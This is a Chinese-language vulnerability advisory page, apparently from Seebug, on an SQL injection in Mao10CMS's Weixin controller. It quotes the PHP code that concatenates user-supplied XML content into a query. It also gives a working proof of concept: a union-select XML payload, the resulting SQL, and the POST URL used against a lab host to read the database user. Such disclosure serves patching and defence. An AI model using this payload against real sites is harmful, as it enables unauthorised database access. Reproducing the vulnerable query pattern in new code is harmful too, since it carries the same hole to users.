Mao10CMS /Application/Control/Controller/WeixinController.class.php SQL注入漏洞

基本字段

漏洞编号：: SSV-89149

披露/发现时间：: 2015-04-20

提交时间：: 2015-04-22

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: Mao10CMS

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.2KB

<ul><li>/Application/Control/Controller/WeixinController.class.php</li></ul><pre class=""> if( $tmpStr == $signature ){ echo $echostr; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if (!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $msgtype = $postObj->MsgType; $content = trim($postObj->Content); $date = strtotime("now"); if($content!='') { $return_to = M('option')->where('type="wx_huifu" AND meta_key="'.$content.'"')->getField('meta_value'); if($return_to!='') : $return_to_user = $return_to; else : $return_to_user = '我没有理解您的问题，请访问我们的网站：'.mc_site_url(); endif; echo "<xml> <ToUserName>$fromUsername</ToUserName> <FromUserName>$toUsername</FromUserName> <CreateTime>$date</CreateTime> <MsgType>text</MsgType> <Content>$return_to_user</Content> </xml>"; } } </pre>$content直接从用户传入的XML获取，拼接到SQL语句中导致SQL注入漏洞。当用户传入：<pre class=""><?xml version="1.0" encoding="utf-8"?> <xml> <ToUserName>aa</ToUserName> <MsgType>aa</MsgType> <Content>asdasd") union select user()#</Content> <FromUserName>a</FromUserName> </xml> </pre>执行的SQL语句为： <pre class="">SELECT `meta_value` FROM `mc_option` WHERE ( type="wx_huifu" AND meta_key="asdasd") union select user()#" ) LIMIT 1</pre>页面返回： <img alt="57145FC8-2F19-448D-BEAF-32A75CF3B061.png" src="https://images.seebug.org/@/uploads/1434332447151-57145FC8-2F19-448D-BEAF-32A75CF3B061.png" data-image-size="364,87"> 证明漏洞存在。使用Hackbar，POST内容到：<pre class="">http://10.211.55.12/mao10cms/index.php?m=control&c=Weixin&a=callback_url&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce=&weixin_token=x</pre>内容为：<pre class=""><?xml version="1.0" encoding="utf-8"?> <xml> <ToUserName>aa</ToUserName> <MsgType>aa</MsgType> <Content>asdasd") union select user()#</Content> <FromUserName>a</FromUserName> </xml> </pre>得到数据库当前用户：<img alt="96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" src="https://images.seebug.org/@/uploads/1434332488347-96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" data-image-size="489,270">